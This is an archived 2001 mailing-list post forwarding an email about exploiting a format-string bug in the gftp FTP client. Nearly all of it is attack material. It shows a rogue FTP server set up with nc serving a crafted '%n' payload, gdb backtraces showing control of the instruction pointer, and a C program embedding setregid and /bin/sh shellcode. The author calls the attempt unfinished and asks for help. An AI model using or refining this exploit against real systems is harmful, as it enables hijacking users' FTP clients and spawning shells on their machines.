Here are some of the other ways of playing with gftp that the SRTeam of snosoft.com have been playing with. http://www.snosoft.com/SRTeam/srteam.html -Krfinisterre -------- Original Message -------- Subject: heres how to exploit gftp Date: Sat, 21 Apr 2001 19:20:22 +0000 From: KRF <dotslashat_private> Reply-To: krfinisterreat_private To: reconat_private here are some ideas... data can u help out... (root)>./execve shellcode addy: 0xbffff848 crtl C (root)>echo -e "\x48\xf8\xff\xbf" Høÿ¿ %n writes data to current frame see example... (root)>echo -e "AAAA%n" > file (root)>nc -l -p 21 < file Program received signal SIGSEGV, Segmentation fault. 0x40325dd7 in vfprintf () from /lib/libc.so.6 (gdb) bt #0 0x40325dd7 in vfprintf () from /lib/libc.so.6 #1 0x40332bbc in vsprintf () from /lib/libc.so.6 #2 0x401ae8d2 in g_strdup_vprintf () from /usr/lib/libglib-1.2.so.0 #3 0x8111248 in ?? () Cannot access memory at address 0x41414141 sooooooooo knowing that we control the eip lets try to point it at some shellcode. (root)>echo -e "\x48\xf8\xff\xbf%n" > file (root)>nc -l -p 21 < file (gdb) run ftp://localhost The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /usr/bin/gftp ftp://localhost warning: Unable to find dynamic linker breakpoint function. Program received signal SIG32, Real-time event 32. 0x4030617e in sigsuspend () from /lib/libc.so.6 (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x40325dd7 in vfprintf () from /lib/libc.so.6 (gdb) bt #0 0x40325dd7 in vfprintf () from /lib/libc.so.6 #1 0x40332bbc in vsprintf () from /lib/libc.so.6 #2 0x401ae8d2 in g_strdup_vprintf () from /usr/lib/libglib-1.2.so.0 #3 0x403c8010 in __morecore () from /lib/libc.so.6 #4 0x80beaf8 in ?? () #5 0xbffffa31 in ?? () #6 0x6e69622f in ?? () Cannot access memory at address 0x7273752f (gdb) Quit I have know idea where I ended up perhaps you can help ?? this is definately not the proper approach to this... (root)>cat > execve.c main() { char hell[] = /* main: */ /* setregid(12, 12); */ "\x29\xc0" /* subl %eax, %eax */ "\xb0\x47" /* movb $71, %al */ "\x29\xdb" /* subl %ebx, %ebx */ "\xb3\x0c" /* movb $12, %bl */ "\x89\xd9" /* movl %ebx, %ecx */ "\xcd\x80" /* int $0x80 */ "\xeb\x18" /* jmp callz */ "\x5e" /* popl %esi */ "\x29\xc0" /* subl %eax, %eax */ "\x88\x46\x07" /* movb %al, 0x07(%esi) */ "\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */ "\x89\x76\x08" /* movl %esi, 0x08(%esi) */ "\xb0\x0b" /* movb $0x0b, %al */ "\x87\xf3" /* xchgl %esi, %ebx */ "\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */ "\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */ "\xcd\x80" /* int $0x80 */ "\xe8\xe3\xff\xff\xff" /* call start */ "\x2f\x62\x69\x6e\x2f\x73\x68"; printf("shellcode addy: 0x%x\n", hell); execl("/usr/bin/gftp", "gftp", "ftp://localhost", 0); exit(0); }
This archive was generated by hypermail 2b30 : Sat Apr 28 2001 - 10:23:00 PDT